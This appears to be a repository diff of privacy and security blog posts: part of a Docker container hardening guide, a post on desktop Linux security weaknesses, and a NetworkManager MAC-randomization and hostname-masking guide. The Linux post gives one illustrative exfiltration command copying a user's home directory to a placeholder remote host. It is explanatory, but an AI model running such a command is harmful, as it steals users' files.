Images are what make containers, well, containers. Containers made from the same image should behave similarly on different machines. Images can have **tags**, which are useful for software versioning. The usage of generic tags such as `latest` is often discouraged because it defeats the purpose of the expected behavior of the container. Tags are not necessarily immutable by design, and they shouldn't be (more on that below). **Digest**, however, is the attribute of an immutable image, and is often generated with the SHA-256 algorithm.
|
||||
|
||||
```
|
||||
docker.io/library/golang:1.17.1@sha256:232a180dbcbcfa7250917507f3827d88a9ae89bb1cdd8fe3ac4db7b764ebb25
|
||||
^ ^ ^ ^
|
||||
| | | |
|
||||
Registry Image Tag Digest (immutable)
|
||||
```
|
||||
|
||||
Now onto why tags shouldn't be immutable: as written above, containers bring us an abstraction over the OS dependencies that are used by the packaged software. That is nice indeed, but this shouldn't lure us into believing that we can forget security updates. The fact is, **there is still a whole OS to care about**, and we can't just think of the container as a simple package tool for software.
|
||||
|
||||
For these reasons, good practices were established:
|
||||
- An image should be as minimal as possible (Alpine Linux, or scratch/distroless).
|
||||
- An image, with a given tag, should be regularly built, without cache to ensure all layers are freshly built.
|
||||
- An image should be rebuilt when the images it's based on are updated.
|
||||
|
||||
### A minimal base system
|
||||
[Alpine Linux](https://alpinelinux.org/) is often the choice for official images for the first reason. This is not a typical Linux distribution as it uses musl as its C library, but it works quite well. Actually, I'm quite fond of Alpine Linux and `apk` (its package manager). If a supervision suite is needed, I'd look into `s6`. If you need a glibc distribution, Debian provides slim variants for lightweight base images. We can do even better than using Alpine by using **distroless images**, allowing us to have state-of-the-art application containers.
|
||||
|
||||
"Distroless" is a fancy name referring to an image with a minimal set of dependencies, from none (for fully static binaries) to some common libraries (typically the C library). Google maintains [distroless images](https://github.com/GoogleContainerTools/distroless) you can use as a base for your own images. If you were wondering, the difference with `scratch` (empty starting point) is that distroless images contain common dependencies that "almost-statically compiled" binaries may need, such as `ca-certificates`.
|
||||
|
||||
However, distroless images are not suited for every application. In my experience though, distroless is an excellent option with pure Go binaries. Going with minimal images drastically reduces the available attack surface in the container. For example, here's a [multi-stage Dockerfile](https://docs.docker.com/develop/develop-images/multistage-build/) resulting in a minimal non-root image for a simple Go project:
|
||||
|
||||
```Dockerfile
|
||||
FROM golang:alpine as build
|
||||
WORKDIR /app
|
||||
COPY . .
|
||||
RUN CGO_ENABLED=0 go mod -o /my_app cmd/my_app
|
||||
|
||||
FROM gcr.io/distroless/static
|
||||
COPY --from=build /my_app /
|
||||
USER nobody
|
||||
ENTRYPOINT ["/my_app"]
|
||||
```
|
||||
|
||||
The main drawback of using minimal images is the lack of tools that help with debugging, which also constitute the very attack surface we're trying to get rid of. The trade-off is probably not worth the hassle for development-focused containers, and if you're running such images in production, you have to be confident enough to operate with them. Note that the `gcr.io/distroless` images have a `:debug` tag to help in that regard.
|
||||
|
||||
### Keeping images up-to-date
|
||||
The two other points are highly problematic, because most software vendors just publish an image on release, and forget about it. You should take it up to them if you're running images that are versioned but not regularly updated. I'd say running scheduled builds **once a week** is the bare minimum to make sure dependencies stay up-to-date. Alpine Linux is a better choice than most other "stable" distributions because it usually has more recent packages.
|
||||
|
||||
Stable distributions often rely on backporting security fixes from CVEs, which is known to be a flawed approach to security since CVEs aren't always assigned or even taken care of. Alpine has more recent packages, and it has versioning, so it's once again a particularly good choice as long as `musl` doesn't cause issues.
|
||||
|
||||
### Is it really a security nightmare?
|
||||
When people say Docker is a security nightmare because of that, that's a fair point. On a traditional system, you could upgrade your whole system with a single command or two. With Docker, you'll have to recreate several containers... if the images were kept up-to-date in the first place. Recreating itself is not a big deal actually: hot upgrades of binaries and libraries often require the services that use them to restart, otherwise they could still use an old (and vulnerable) version of them in memory. But yeah, the fact is most people are running outdated containers, and more often than not, they don't have the choice if they rely on third-party images.
|
||||
|
||||
[Trivy](https://github.com/aquasecurity/trivy) is an excellent tool to scan images for a subset of **known vulnerabilities** an image might have. You should play with it and see for yourself how outdated many publicly available images are.
|
||||
|
||||
### Supply-chain attacks
|
||||
As with any code downloaded from a software vendor, OCI images are not exempt from supply-chain attacks. The good practice is quite simple: rely on official images, and ideally build and maintain your own images. One should definitely not automatically trust random third-party images they can find on Docker Hub. Half of these images, if not more, contain vulnerabilities, and I bet a good portion of them contains malwares [such as miners](https://www.trendmicro.com/vinfo/fr/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining) or worse.
|
||||
|
||||
As an image maintainer, you can sign your images to improve the authenticity assurance. Most official images make use of [Docker Content Trust](https://docs.docker.com/engine/security/trust/), which works with a OCI registry attached to a [Notary server](https://github.com/notaryproject/notary). With the Docker toolset, setting the environment variable `DOCKER_CONTENT_TRUST=1` enforces signature verification (a signature is only good if it's checked in the first place). The SigStore initiative is developing [cosign](https://github.com/sigstore/cosign), an alternative that doesn't require a Notary server because it works with features already provided by the registry such as tags. Kubernetes users may be interested in [Connaisseur](https://github.com/sse-secure-systems/connaisseur) to ensure all signatures have been validated.
|
||||
|
||||
## Leave my root alone!
|
||||
|
||||
### Attack surface
|
||||
Traditionally, Docker runs as a daemon owned by root. That also means that root in the container is actually the root on the host and may be a few commands away from compromising the host. More generally, the attacker has to exploit the available attack surface to escape the container. There is a huge attack surface, actually: the Linux kernel. [Someone wise once said](https://grsecurity.net/huawei_hksp_introduces_trivially_exploitable_vulnerability):
|
||||
|
||||
> The kernel can effectively be thought of as the largest, most vulnerable setuid root binary on the system.
|
||||
|
||||
That applies particularly to traditional containers which weren't designed to provide a robust level of isolation. A recent example was [CVE-2022-0492](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/): the attacker could abuse root in the container to exploit cgroups v1, and compromise the host. Of course defense-in-depth measures would have prevented that, and we'll mention them. But fundamentally, container escapes are possible by design.
|
||||
|
||||
Breaking out via the OCI runtime `runc` is also possible, although [CVE-2019-5736](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/) was a particularly nasty bug. The attacker had to gain access to root in the container first in order to access `/proc/[runc-pid]/exe`, which indicates them where to overwrite the `runc` binary.
|
||||
|
||||
Good practices have been therefore established:
|
||||
- Avoid using root in the container, plain and simple.
|
||||
- Keep the host kernel, Docker and the OCI runtime updated.
|
||||
- Consider the usage of user namespaces.
|
||||
|
||||
By the way, it goes without saying that any user who has access to the Docker daemon should be considered as privileged as root. Mounting the Docker socket (`/var/run/docker.sock`) in a container makes it highly privileged, and so it should be avoided. The socket should only be owned by root, and if that doesn't work with your environment, use Docker rootless or Podman.
|
||||
|
||||
### Avoiding root
|
||||
root can be avoided in different ways in the final container:
|
||||
- Image creation time: setting the `USER` instruction in the Dockerfile.
|
||||
- Container creation time: via the tools available (`user:` in the Compose file).
|
||||
- Container runtime: degrading privileges with entrypoints scripts (`gosu UID:GID`).
|
||||
|
||||
Well-made images with security in mind will have a `USER` instruction. In my experience, most people will run images blindly, so it's good harm reduction. Setting the user manually works in some images that aren't designed without root in mind, and it's also great to mitigate some *scenarii* where the image is controlled by an attacker. You also won't have surprises when mounting volumes, so I highly recommend setting the user explicitly and make sure volume permissions are correct once.
|
||||
|
||||
Some images allow users to define their own user with UID/GID environment variables, with an entrypoint script that runs as root and takes care of the volume permissions before dropping privileges. While technically fine, it is still attack surface, and it requires the `SETUID`/`SETGID` capabilities to be available in the container.
|
||||
|
||||
### User namespaces: sandbox or paradox?
|
||||
As mentioned just above, [user namespaces](https://www.man7.org/linux/man-pages/man7/user_namespaces.7.html) are a solution to ensure root in the container is not root on the host. Docker supports user namespaces, for instance you could set the default mapping in `/etc/docker/daemon.json`:
|
||||
|
||||
```
|
||||
"userns-remap": "default"
|
||||
```
|
||||
|
||||
`whoami && sleep 60` in the container will return root, but `ps -fC sleep` on the host will show us the PID of another user. That is nice, but it has limitations and therefore shouldn't be considered as a real sandbox. In fact, the paradox is that [user namespaces are attack surface](https://lists.archlinux.org/pipermail/arch-general/2017-February/043066.html) (and vulnerabilities are still being found [years later](https://www.openwall.com/lists/oss-security/2022/01/29/1)), and it's common wisdom to restrict them to privileged users (`kernel.unprivileged_userns_clone=0`). That is fine for Docker with its traditional root daemon, but Podman expects you to let unprivileged users interact with user namespaces (so essentially privileged code).
|
||||
|
||||
Enabling `userns-remap` in Docker shouldn't be a substitute for running unprivileged application containers (where applicable). User namespaces are mostly useful if you intend to run full-fledged OS containers which need root in order to function, but that is out of the scope of the container technologies mentioned in this article; for them, I'd argue exposing such a vulnerable attack surface from the host kernel for dubious sandboxing benefits isn't an interesting trade-off to make.
|
||||
|
||||
### The no_new_privs bit
|
||||
After ensuring root isn't used in your containers, you should look into setting the `no_new_privs` bit. [This Linux feature](https://docs.kernel.org/userspace-api/no_new_privs.html) restricts syscalls such as `execve()` from granting privileges, which is what you want to restrict in-container privilege escalation. This flag can be set for a given container in a Compose file:
|
||||
|
||||
```
|
||||
security_opt:
|
||||
- no-new-privileges: true
|
||||
```
|
||||
|
||||
Gaining privileges in the container will be much harder that way.
|
||||
|
||||
### Capabilities
|
||||
Furthermore, we should mention capabilities: root powers are divided into distinct units by the Linux kernel, called capabilities. Each granted capability also grants privilege and therefore access to a significant amount of attack surface. Security researcher Brad Spengler enumerates [19 important capabilities](https://forums.grsecurity.net/viewtopic.php?f=7&t=2522#p10271). Docker **restricts certain capabilities by default**, but [some of the most important ones](https://github.com/moby/moby/blob/1308a3a99faa13ff279dcb4eb5ad23aee3ab5cdb/oci/caps/defaults.go) are still available to a container by default.
|
||||
|
||||
You should consider the following rule of thumb:
|
||||
- Drop all capabilities by default.
|
||||
- Allow only the ones you really need to.
|
||||
|
||||
If you already run your containers unprivileged without root, your container will very likely work fine with all capabilities dropped. That can be done in a Compose file:
|
||||
|
||||
```
|
||||
cap_drop:
|
||||
- ALL
|
||||
#cap_add:
|
||||
# - CHOWN
|
||||
# - DAC_READ_SEARCH
|
||||
# - SETUID
|
||||
# - SETGID
|
||||
```
|
||||
Never use the `--privileged` option unless you really need to: a privileged container is given access to almost all capabilities, kernel features and devices.
|
||||
|
||||
## Other security features
|
||||
MACs and seccomp are robust tools that may vastly improve container security.
|
||||
|
||||
### Mandatory Access Control
|
||||
MAC stand for Mandatory Access Control: traditionally a Linux Security Module that will enforce a policy to restrict the userspace. Examples are **AppArmor** and **SELinux**: the former being more easy-to-use, the later being more fine-grained. Both are strong tools that can help... Yet, their sole presence does not mean they're really effective. A robust policy starts from a *deny all* policy, and only allows the necessary resources to be accessed.
|
||||
|
||||
### seccomp
|
||||
seccomp (short for secure computing mode) on the other hand is a much simpler and complementary tool, and there is no reason not to use it. What it does is restricting a process to a set of system calls, thus drastically reducing the attack surface available.
|
||||
|
||||
Docker provides default profiles for [AppArmor](https://github.com/moby/moby/tree/85eaf23bf46b12827273ab2ff523c753117dbdc7/profiles/apparmor) and [seccomp](https://github.com/moby/moby/blob/85eaf23bf46b12827273ab2ff523c753117dbdc7/profiles/seccomp/default.json), and they're enabled by default for newly created containers unless the `unconfined` option is explicitly passed. Note: Kubernetes doesn't enable the default seccomp profile by default, so you should probably [try it](https://kubernetes.io/docs/tutorials/security/seccomp/#enable-the-use-of-runtimedefault-as-the-default-seccomp-profile-for-all-workloads).
|
||||
|
||||
These profiles are a great start, but you should do much more if you take security seriously, because they were made to not break compatibility with a large range of images. The default seccomp profile only disables [around 44 syscalls](https://docs.docker.com/engine/security/seccomp/#significant-syscalls-blocked-by-the-default-profile), which are mostly not very common and/or obsoleted. Of course, the best profile you can get is supposed to be written for a given program. It also doesn't make sense to insist on the permissiveness of the default profiles, and [a lof of work has gone](https://blog.jessfraz.com/post/containers-security-and-echo-chambers/) into hardening containers.
|
||||
|
||||
### cgroups
|
||||
Use cgroups to restrict access to hardware and system resources. You likely don't want a guest container to monopolize the host resources. You also don't want to be vulnerable to stupid fork bomb attacks. In a Compose file, consider setting these limits:
|
||||
|
||||
```
|
||||
mem_limit: 4g
|
||||
cpus: 4
|
||||
pids_limit: 256
|
||||
```
|
||||
|
||||
More runtime options can be found in [the official documentation](https://docs.docker.com/config/containers/resource_constraints/). All of them should have a [Compose spec](https://github.com/compose-spec/compose-spec/blob/master/spec.md) equivalent.
|
||||
|
||||
The `--cgroup-parent` option should be avoided as it uses the host cgroup and not the one configured from Docker (or else), which is the default.
|
||||
|
||||
### Read-only filesystem
|
||||
It is good practice to treat the image as some refer to as the "golden image".
|
||||
|
||||
In other words, you'll run containers in *read-only* mode, with an immutable filesystem inherited from the image. Only the mounted volumes will be read/write accessible, and those should ideally be mounted with the `noexec`, `nosuid` and `nodev` options for extra security. If read/write access isn't needed, mount these volumes as read-only too.
|
||||
|
||||
However, the image may not be perfect and still require read/write access to some parts of the filesystem, likely directories such as `/tmp`, `/run` or `/var`. You can make a **tmpfs** for those (a temporary filesystem in the container attributed memory), because they're not persistent data anyway.
|
||||
|
||||
In a Compose file, that would look like the following settings:
|
||||
|
||||
```
|
||||
read_only: true
|
||||
tmpfs:
|
||||
- /tmp:size=10M,mode=0770,uid=1000,gid=1000,noexec,nosuid,nodev
|
||||
```
|
||||
|
||||
That is quite verbose indeed, but that's to show you the different options for a tmpfs mount. You want to restrict them in size and permissions ideally.
|
||||
|
||||
### Network isolation
|
||||
By default, all Docker containers will use the default network bridge. They will see and be able to communicate with each other. Each container should have its own user-defined bridge network, and each connection between containers should have an internal network. If you intend to run a reverse proxy in front of several containers, you should make a dedicated network for each container you want to expose to the reverse proxy.
|
||||
|
||||
The `--network host` option also shouldn't be used for obvious reasons since the container would share the same network as the host, providing no isolation at all.
|
||||
|
||||
## Alternative runtimes (gVisor)
|
||||
`runc` is the reference OCI runtime, but that means other runtimes can exist as well as long as they're compliant with the OCI standard. These runtimes can be interchanged quite seamlessly. There's a few alternatives, such as [crun](https://github.com/containers/crun) or [youki](https://github.com/containers/youki), respectively implemented in C and Rust (`runc` is a Go implementation). However, there is one particular runtime that does a lot more for security: `runsc`, provided by the [gVisor project](https://gvisor.dev/) by the folks at Google.
|
||||
|
||||
**Containers are not a sandbox**, and while we can improve their security, they will fundamentally share a common attack surface with the host. Virtual machines are a solution to that problem, but you might prefer container semantics and ecosystem. gVisor can be perceived as an attempt to get the "best of both worlds": containers that are easy to manage while providing a native isolation boundary. gVisor did just that by implementing two things:
|
||||
|
||||
- **Sentry**: an application kernel in Go, a language known to be memory-safe. It implements the Linux logic in userspace such as various system calls.
|
||||
- **Gofer**: a host process which communicates with Sentry and the host filesystem, since Sentry is restricted in that aspect.
|
||||
|
||||
A platform like ptrace or KVM is used to intercept system calls and redirect them from the application to Sentry, which is running in the userspace. This has some costs: there is a higher per-syscall overhead, and compatibility is reduced since not all syscalls are implemented. On top of that, gVisor employs security mechanisms we've glanced over above, such as a [very restrictive seccomp profile](https://github.com/google/gvisor/blob/86ad7d5b5838da1b539e976886d04b93c939ca3d/runsc/boot/filter/config.go) between Sentry and the host kernel, the [no_new_privs bit](https://github.com/google/gvisor/blob/6ef268409620c57197b9d573e23be8cb05dbf381/pkg/sentry/kernel/task_identity.go#L464), and isolated namespaces from the host.
|
||||
|
||||
The security model of gVisor is comparable to what you would expect from a virtual machine. It is also very easy to [install and use](https://gvisor.dev/docs/user_guide/install/). The path to runsc along with its different configuration flags (`runsc flags`) should be added to `/etc/docker/daemon.json`:
|
||||
|
||||
```json
|
||||
"runtimes": {
|
||||
"runsc-ptrace": {
|
||||
"path": "/usr/local/bin/runsc",
|
||||
"runtimeArgs": [
|
||||
"--platform=ptrace"
|
||||
]
|
||||
},
|
||||
"runsc-kvm": {
|
||||
"path": "/usr/local/bin/runsc",
|
||||
"runtimeArgs": [
|
||||
"--platform=kvm"
|
||||
]
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
`runsc` needs to start with root to set up some mitigations, including the use of its own network stack separated from the host. The sandbox itself drops privileges to nobody as soon as possible. You can still use `runsc` rootless if you want (which should be needed for Podman):
|
||||
|
||||
```
|
||||
./runsc --rootless do uname -a
|
||||
*** Warning: sandbox network isn't supported with --rootless, switching to host ***
|
||||
Linux 4.4.0 #1 SMP Sun Jan 10 15:06:54 PST 2016 x86_64 GNU/Linux
|
||||
```
|
||||
|
||||
Linux 4.4.0 is shown because that is the version of the Linux API that Sentry tries to mimic. As you've probably guessed, you're not really using Linux 4.4.0, but the application kernel that behaves like it. By the way, gVisor is of course compatible with cgroups.
|
||||
|
||||
## Conclusion: what's a container after all?
|
||||
Like I wrote above, a container is mostly defined by its semantics and ecosystem. Containers shouldn't be solely defined by the OCI reference runtime implementation, as we've seen with gVisor that provides an entirely different security model.
|
||||
|
||||
Still not convinced? What if I told you a container can leverage the same technologies as a virtual machine? That is exactly what [Kata Containers](https://katacontainers.io/) does by using a VMM like QEMU-lite to provide containers that are in fact lightweight virtual machines, with their traditional resources and security model, compatibility with container semantics and toolset, and an optimized overhead. While not in the OCI ecosystem, Amazon achieves quite the same with [Firecracker](https://firecracker-microvm.github.io/).
|
||||
|
||||
If you're running untrusted workloads, I highly suggest you consider gVisor instead of a traditional container runtime. Your definition of "untrusted" may vary: for me, almost everything should be considered untrusted. That is how modern security works, and how mobile operating systems work. It's quite simple, security should be simple, and gVisor simply offers native security.
|
||||
|
||||
Containers are a popular, yet strange world. They revolutionized the way we make and deploy software, but one should not loose the sight of what they really are and aren't. This hardening guide is non-exhaustive, but I hope it can make you aware of some aspects you've never thought of.
|
58
content/posts/linux/Linux Insecurities.md
Normal file
58
content/posts/linux/Linux Insecurities.md
Normal file
|
@ -0,0 +1,58 @@
|
|||
---
|
||||
title: "Linux Insecurities"
|
||||
date: 2022-07-18
|
||||
tags: ['Operating Systems', 'Linux', 'Security',]
|
||||
author: Tommy
|
||||
---
|
||||
|
||||
There is a common misconception among privacy communities that Linux is one of the more secure operating systems, either because it is open-source or because it is widely used in the cloud. However, this is a far cry from reality.
|
||||
|
||||
There is already a very in-depth technical blog explaining the various security weaknesses of Linux by Madaidan, [Whonix](https://www.whonix.org/)'s Security Researcher. This page will attempt to address some of the questions commonly raised in reaction to his blog post. You can find the original article [here](https://madaidans-insecurities.github.io/linux.html).
|
||||
|
||||

|
||||
|
||||
## Why is Linux used on servers if it is so insecure?
|
||||
|
||||
On servers, while most of the problems referenced in the article still exist, they are somewhat less problematic.
|
||||
|
||||
On Desktop Linux, GUI applications run under your user, and thus have access to all of your files in `/home`. This is in contrast to how system daemons typically run on servers, where they have their own group and user. For example, NGINX will run under `nginx:nginx` on Red Hat distributions, or `www-data:www-data` on Debian based ones. Discretionary Access Control does help with filesystem access control for server processes, but is useless for desktop applications.
|
||||
|
||||
Another thing to keep in mind is that Mandatory Access Control is also somewhat effective on servers, as commonly run system daemons are confined. In contrast, on desktop, there is virtually no AppArmor profile to confine even regularly used apps like Chrome or Firefox, let alone less common ones. On SELinux systems, these apps run in the UNCONFINED SELinux domain.
|
||||
|
||||
Linux servers are lighter than Desktop Linux systems by orders of magnitude, without hundreds of packages and dozens of system daemons running like X11, audio servers, printing stack, and so on. Thus, the attack surface is much smaller.
|
||||
|
||||
## Linux Hardening Myths
|
||||
|
||||
There is a common claim in response to Madaidan that Linux is only insecure by default, and that an experienced user can make it the most secure operating system out there, surpassing the likes of macOS or ChromeOS. Unfortunately, this is wishful thinking. There is no amount of hardening that one can reasonably apply as a user to fix up the inherent issues with Linux.
|
||||
|
||||
### Lack of verified boot
|
||||
|
||||
macOS, ChromeOS, and Android have a clear distinction between the system and user installed application. In over simplified terms, the system volume is signed by the OS vendor, and the firmware and boot loader works to make sure that said volume has the authorized signature. The operating system itself is immutable, and nothing the user does will need or be allowed to tamper with the system volume.
|
||||
|
||||
On Linux, there is no such clear distinction between the system and user installed applications. Linux distributions are a bunch of packages put together to make a system that works, and thus every package is treated as part of said system. The end result is that binaries, regardless of whether they are vital for the system to function or just an extra application, are thrown into the same directories as each other (namely `/usr/bin` and `/usr/local/bin`). This makes it impossible for an end user to setup a verification mechanism to verify the integrity of "the system", as said "system" is not clearly defined in the first place.
|
||||
|
||||
### Lack of application sandboxing
|
||||
|
||||
Operating systems like Android and ChromeOS have full system mandatory access control, every process from the init process is strictly confined. Regardless of which application you install or how you install them, they have to play by the rules of an untrusted SELinux domain and are only able to utilize unprivileged APIs.
|
||||
|
||||
Even on macOS, where the application sandbox is opt-in for developers, there is still a permission control system (TCC) for unprivileged applications. Apps run by the user do not have unrestricted access to their microphone, webcam, keystrokes, sensitive documents, and so on.
|
||||
|
||||
On Linux, it is quite the opposite. Out of the box, most systems only have a few system daemons confined. Some Linux distributions don't even have a Mandatory Access Control system at all. Applications are designed in an environment where they expect to be able to do whatever they want, and the app sandboxes/mandatory access control system are merely an afterthought trying to restrict an app to only access what it expects to be accessible.
|
||||
|
||||
This is reflected in the under utilization of the [Portals API](https://docs.flatpak.org/en/latest/portal-api-reference.html) as an example. Portals is designed to be an API where apps have to prompt the user to access their files (through the File Manager) or their microphone and camera. Unfortunately, the vast majority of apps are not designed with this in mind, and expect direct access to the filesystem, pulseaudio socket or the entire `/dev`. As a result, Flatpak maintainers often opt to have extremely lax permissions to the point where they have to grant `filesystem=home`, `filesystem=host`, `socket=pulseaudio` or `devices=all`, otherwise apps will break and give users a bad experience.
|
||||
|
||||
To make matters worse, some system daemons are not designed with permission control in mind at all. For example, PulseAudio does not have any concept of audio in or out permission. Thus, the user is often left with only the choice of granting an app access to the socket or not. If they want to block microphone access, they have to block access to the socket, and thus break audio playback in the process. If they do want an audio playback, then they have to allow access to the PulseAudio socket, which in turns give an app unrestricted access to record them at any moment.
|
||||
|
||||
The only way to systematically fix this problem is to design a whole new system from scratch with a permission model like that of Android in mind. And even when that happens, it will take substantial work to get developers to develop their apps for said system.
|
||||
|
||||
## But Linux is open source!
|
||||
|
||||
Something being open source does not imply that it is inherently private, secure, or trustworthy. I recommend reading the [FLOSS Security](/posts/knowledge/floss-security) post by [Rohan Kumar](https://seirdy.one/posts/2022/02/02/floss-security/).
|
||||
|
||||
## But there is less malware on Linux!
|
||||
|
||||
**Security by irrelevance does not work**. Just because there are fewer users of your favorite operating system does not make it any safer.
|
||||
|
||||
Ask yourself this: Would you ditch Windows for ReactOS considering that it is a lot less popular and is less targeted? Likewise, would you ditch Linux desktop when it becomes the mainstream solution for the BSDs or some niche operating systems just because they are less popular?
|
||||
|
||||
Malware for Linux does exist, and it is not hard to make. It can be something as trivial as a shell script or binary executing `scp -r ~/ malware@xx.xx.xx.xx:/data`. Due to the lack of application sandboxing or an application permission model, your computer can be compromised the moment you execute a malicious binary, shell script, or install script with or without root and with or without an exploit. This is, of course, not to discount the fact that many exploits do exist on Linux just like on any other operating systems as well.
|
181
content/posts/linux/NetworkManager Trackability Reduction.md
Normal file
181
content/posts/linux/NetworkManager Trackability Reduction.md
Normal file
|
@ -0,0 +1,181 @@
|
|||
---
|
||||
title: "NetworkManager Trackability Reduction"
|
||||
tags: ['Operating Systems', 'Linux', 'Privacy']
|
||||
date: 2022-09-04
|
||||
author: WfKe9vLwSvv7rN
|
||||
canonicalURL: https://wanderingcomputerer.gitlab.io/guides/tips/nm-hardening/
|
||||
ShowCanonicalLink: true
|
||||
---
|
||||
|
||||
## MAC address randomization
|
||||
|
||||
Note that Ethernet connections can still be tracked via switch ports, and WiFi connections can be broadly localized by access point.
|
||||
|
||||
Furthermore, MAC address spoofing and randomization depends on firmware support from the interface. Most modern network interface cards support the feature.
|
||||
|
||||
There are three different aspects of MAC address randomization in NetworkManager, each with their own configuration flag:
|
||||
|
||||
#### WiFi scanning
|
||||
|
||||
```
|
||||
[device]
|
||||
wifi.scan-rand-mac-address=yes
|
||||
```
|
||||
|
||||
#### WiFi connections
|
||||
|
||||
```
|
||||
[connection]
|
||||
wifi.cloned-mac-address=<mode>
|
||||
```
|
||||
|
||||
#### Ethernet connections
|
||||
|
||||
```
|
||||
[connection]
|
||||
ethernet.cloned-mac-address=<mode>
|
||||
```
|
||||
|
||||
#### Mode options
|
||||
|
||||
`random`: Generate a new random MAC address every time a connection is activated
|
||||
|
||||
`stable`: Assign each connection a random MAC address that will be maintained across activations
|
||||
|
||||
`preserve`: Use the MAC address already assigned to the interface (such as from `macchanger`), or the permanent address if none is assigned
|
||||
|
||||
`permanent`: Use the MAC address permanently baked into the hardware
|
||||
|
||||
### Setting a default configuration {#macrand-default-configuration}
|
||||
|
||||
It's best to create a dedicated configuration file, such as `/etc/NetworkManager/conf.d/99-random-mac.conf`, to ensure package updates do not overwrite the configuration. In general, I recommend the following:
|
||||
|
||||
```
|
||||
[device]
|
||||
wifi.scan-rand-mac-address=yes
|
||||
|
||||
[connection]
|
||||
wifi.cloned-mac-address=random
|
||||
ethernet.cloned-mac-address=random
|
||||
```
|
||||
|
||||
This configuration randomizes all MAC addresses by default. These settings can of course be [overridden on a per-connection basis](#per-connection-overrides).
|
||||
|
||||
After editing the file, run `sudo nmcli general reload conf` to apply the new configuration.
|
||||
|
||||
### Per-connection overrides
|
||||
|
||||
Connection-specific settings take precedence over configuration file defaults. They can be set through `nm-connection-editor` ("Network Connections"), a DE-specific network settings GUI, `nmtui`, or `nmcli`.
|
||||
|
||||
Look for "Cloned MAC address" under the "Wi-Fi" or "Ethernet" section:
|
||||
|
||||

|
||||
|
||||
In addition to the four mode keywords, you can input an exact MAC address to be used for that connection.
|
||||
|
||||
For a home or other trusted network, it can be helpful to use `stable` or even `permanent`, as MAC address stability can help avoid being repeatedly served a new IP address and DHCP lease (though not all DHCP servers work this way).
|
||||
|
||||
For public networks with captive portals (webpages that must be accessed to gain network access), the `stable` setting can help prevent redirection back to the captive portal after a brief disconnection or roaming to a different access point.
|
||||
|
||||
### Seeing the randomized MAC address
|
||||
|
||||
Activate the connection in question, and then look for `GENERAL.HWADDR` in the output of `nmcli device show`. This represents the MAC address currently in use by the interface, whether randomized or not. It is also visible as "Hardware Address" (or similar) in NetworkManager GUIs under active connection details.
|
||||
|
||||
```bash
|
||||
$ nmcli device show
|
||||
GENERAL.DEVICE: enp5s0
|
||||
GENERAL.TYPE: ethernet
|
||||
GENERAL.HWADDR: XX:XX:XX:XX:XX:XX
|
||||
|
||||
GENERAL.DEVICE: wlp3s0
|
||||
GENERAL.TYPE: wifi
|
||||
GENERAL.HWADDR: XX:XX:XX:XX:XX:XX
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Remove static hostname to prevent hostname broadcast
|
||||
|
||||
|
||||
```bash
|
||||
sudo hostnamectl hostname "localhost"
|
||||
```
|
||||
|
||||
An empty (blank) hostname is also an option, but a static hostname of "localhost" is less likely to cause breakage. Both will result in no hostname being broadcasted to the DHCP server.
|
||||
|
||||
### Disabling transient hostname management {#rmhostname-transient}
|
||||
|
||||
It's best to create a dedicated configuration file, such as `/etc/NetworkManager/conf.d/01-transient-hostname.conf`, to ensure package updates do not overwrite the configuration:
|
||||
|
||||
```
|
||||
[main]
|
||||
hostname-mode=none
|
||||
```
|
||||
|
||||
This will prevent NetworkManager from setting transient hostnames that may be provided by some DHCP servers. This will have no visible effect except with an empty static hostname.
|
||||
|
||||
After editing the file, run `sudo nmcli general reload conf` to apply the new configuration. Run `sudo hostnamectl --transient hostname ""` to reset the transient hostname.
|
||||
|
||||
---
|
||||
|
||||
## Disable sending hostname to DHCP server
|
||||
|
||||
**This configuration will leak your hostname on first connection.** Setting a generic or random hostname is strongly recommended if possible.
|
||||
|
||||
Due to [limitations in NetworkManager](https://gitlab.freedesktop.org/NetworkManager/NetworkManager/-/issues/584 "NetworkManager issue: No way to set dhcp-send-hostname globally"), it is not possible to reliably disable sending hostnames by default. This setup is very much a hack.
|
||||
|
||||
Due to being leaky, this configuration is virtually useless without also [randomizing MAC addresses by default](#macrand-default-configuration "MAC address randomization — Setting a default configuration"). Your MAC address and hostname will not be correlated starting with the second connection, assuming the first connection used a random MAC address.
|
||||
|
||||
Create `/etc/NetworkManager/dispatcher.d/no-wait.d/01-no-send-hostname.sh` as follows:
|
||||
|
||||
```sh
|
||||
#!/bin/sh
|
||||
|
||||
if [ "$(nmcli -g 802-11-wireless.cloned-mac-address c show "$CONNECTION_UUID")" = 'permanent' ] \
|
||||
|| [ "$(nmcli -g 802-3-ethernet.cloned-mac-address c show "$CONNECTION_UUID")" = 'permanent' ]
|
||||
then
|
||||
nmcli connection modify "$CONNECTION_UUID" \
|
||||
ipv4.dhcp-send-hostname true \
|
||||
ipv6.dhcp-send-hostname true
|
||||
else
|
||||
nmcli connection modify "$CONNECTION_UUID" \
|
||||
ipv4.dhcp-send-hostname false \
|
||||
ipv6.dhcp-send-hostname false
|
||||
fi
|
||||
```
|
||||
|
||||
The script must have specific file permissions and a symlink to take effect:
|
||||
|
||||
```bash
|
||||
cd /etc/NetworkManager/dispatcher.d/
|
||||
sudo chown root:root no-wait.d/01-no-send-hostname.sh
|
||||
sudo chmod 744 no-wait.d/01-no-send-hostname.sh
|
||||
sudo ln -s no-wait.d/01-no-send-hostname.sh ./
|
||||
```
|
||||
|
||||
This script will be automatically triggered on connection events to modify the connection's `dhcp-send-hostname` settings. If the connection's _cloned MAC address_ is [explicitly overridden](#per-connection-overrides) to `permanent`, the hostname will be sent to the DHCP server on future connections. In all other cases, the hostname will be masked on future connections, so the DHCP server will only see the MAC address.
|
||||
|
||||
### Verifying proper operation
|
||||
|
||||
After initiating first connection with a network:
|
||||
|
||||
```bash
|
||||
$ nmcli c show <connection> | grep dhcp-send-hostname
|
||||
ipv4.dhcp-send-hostname: no
|
||||
ipv6.dhcp-send-hostname: no
|
||||
```
|
||||
|
||||
`<connection>` can be the connection name (usually the SSID for WiFi networks) or UUID, obtained from `nmcli c show [--active]`.
|
||||
|
||||
_Recall that these setting values are set based on the previous connection activation and take effect for the next connection activation._
|
||||
|
||||
---
|
||||
|
||||
## Sources
|
||||
- [ArchWiki --- NetworkManager](https://wiki.archlinux.org/title/NetworkManager#Configuring_MAC_address_randomization)
|
||||
